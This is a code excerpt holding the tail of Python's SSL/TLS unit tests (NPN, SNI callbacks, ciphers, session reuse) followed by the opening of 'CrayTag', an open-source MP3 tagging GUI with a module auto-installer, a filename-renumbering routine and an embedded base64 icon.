client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
            if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLS 1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
CrayTag.pyw
|
class ver:
sion="2.1" # Version number of program. # ver.sion
"""
##############################
CrayTag.
##############################
Coded by: Dalton Overlin
##########################################################
Last Code Revision Date: May. 26th, 2020
##########################################################
    This is freeware! FREEWARE!
    If someone asks you to pay for this program,
    they are a crook and you've been scammed!
    I am releasing this program for use at no cost.
    I will not give anyone any form
    of authorization to sell this program (unmodified) for
    a price. Just be aware of this: this code is open source
    and is freeware! Don't be tricked into paying for free software.
##########################################################
MIT License
-----------
Copyright (c) 2020 Dalton Overlin https://github.com/Dalton-Overlin/CrayTag
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import os, sys, threading
def ravage():
try:
os._exit(0)
except:
print('Kraken Error!')
sys.exit("Kraken Error!")
def installer(x):
    print(('\n'*2)+'This module: ( '+x+' ) is not installed.\n\nIf you type yes & press enter I will try to install it for you.\nIf not, just press enter and the program will exit.\nNote: here are two commands you can run to install the missing module yourself.\n\n'+'python -m pip install '+x+'\npip install '+x)
c=str(input())
    if 'y' in c.lower():
vue=os.system('python -m pip install '+str(x))
if vue==0:
return
else:
            print('\n\nThis module: ',str(x),' could not be automatically installed; please install it manually.')
input()
ravage()
else:
print('Exiting, Goodbye:)')
ravage()
sys.setrecursionlimit(100000)
try:
import random
except:
installer('random')
import random
try:
import string
except:
installer('string')
import string
try:
import tkinter
from tkinter import *
from tkinter import filedialog
from tkinter import PhotoImage
import tkinter.font as tkFont
import tkinter as tk
except:
installer('tkinter')
import tkinter
from tkinter import *
from tkinter import filedialog
from tkinter import PhotoImage
import tkinter.font as tkFont
import tkinter as tk
try:
import shutil
except:
installer('shutil')
import shutil
try:
import time
except:
installer('time')
import time
try:
import datetime
except:
installer('datetime')
import datetime
try:
import eyed3
except:
installer('eyed3')
import eyed3
try:
import tinytag
from tinytag import TinyTag
except:
installer('tinytag')
import tinytag
from tinytag import TinyTag
try:
from PIL import ImageTk, Image
except:
installer('pillow')
from PIL import ImageTk, Image
eyed3.log.setLevel("ERROR")
class dirTree:
A=os.getcwd()
B=os.getcwd()
def browse_button():
coo = filedialog.askdirectory(initialdir = dirTree.B)
if os.path.isdir(coo):
dirTree.B=str(coo)
return coo
def browseFile():
return filedialog.askopenfilename(initialdir = dirTree.A,title = "Select Image File",filetypes = (("jpeg files","*.jpg"),("all files","*.*")))
class ram:
NotifyMissingArtist=True # DONE
NotifyMissingCover=True # DONE
NotifyMissingAlbumName=True # DONE
RenumberFilenames=True # DONE
ResizeAlbumCoverSize=480,480 # DONE
ChangeAllGenres=False # DONE
GenreToChangeTo="Pop" # DONE
LiveFeedback="Initializing." # The GUI will pull live data from here.
files=0 # Number of mp3s tagged.
rt=None # The root holder for settings.
CoversToSearchFor=None # Filenames of covers to search for.
FilesToDelete=None # List of files to delete.
coffee=None # DONE
DontResiveJPG=False # DONE
WillEmbedArt=True # DONE
KeepBackup=True # DONE
DeleteEmbedded=True # DONE
KillThread=False # DONE
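# Illustrative note (added commentary, not part of the original program): the ram class
# above acts as a mutable, process-wide settings store; the GUI and the tagging thread
# read and write these class attributes directly. A hypothetical caller could, for example, do
#
#     ram.ChangeAllGenres = True
#     ram.GenreToChangeTo = "Rock"
#     ram.ResizeAlbumCoverSize = 600, 600
#
# before starting a tagging run, and poll ram.LiveFeedback for status text.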
class maxx:
div=' ' # This can be anything like ' ', ' - ', etc. maxx.div
def reno(Input):
if type(Input)!=list:
print('Input must be list!')
return None
else:
            if Input==[]:
                print("Can't send an empty list for sorting!")
                return Input # Nothing to renumber.
if ram.RenumberFilenames==False:
return Input
newHold=[]
Input.sort()
        for tv in Input: # Strip any existing leading number / 'NA' marker and its separator from each name.
t=str(tv)
while t[0]==' ':
t=t[1:]
kpop=True
try:
if t[:2]=='NA' and t[2:3] in [' ','-','_','+','=','~','.']:
temp = str(t)
temp=temp.strip()
if temp[:2]=='NA':
temp=temp[2:]
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
elif t.replace(' ','')[0] in ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']:
temp = str(t)
temp=temp.strip()
con=0
for v in temp:
if v in ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']:
con+=1
else:
break
temp=temp[con:]
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
else:
temp = str(t)
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
except:
temp = str(t)
temp=temp.strip()
newHold.append(maxx.div+temp)
tim=len(str(len(newHold)))
if tim==1:
tim=2
cova=1
holder=[]
for t in newHold:
temp=str(cova)
while len(temp) != tim:
temp='0'+temp
holder.append(temp+t)
cova+=1
return holder
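# Illustrative trace of maxx.reno (added commentary, not part of the original program).
# reno() strips a leading track number (or a leading 'NA' marker) plus one trailing
# separator character from each name, then renumbers the sorted list with zero-padded
# indices prefixed by maxx.div. Assuming ram.RenumberFilenames is True and
# maxx.div == ' ', a call like the one below should behave roughly as shown:
#
#     maxx.reno(['1. a.mp3', '02 - b.mp3'])
#     # sorted input: ['02 - b.mp3', '1. a.mp3']
#     # result:       ['01 b.mp3', '02 a.mp3']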
class ex:
tide = os.getcwd()
class img:
B="""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"""
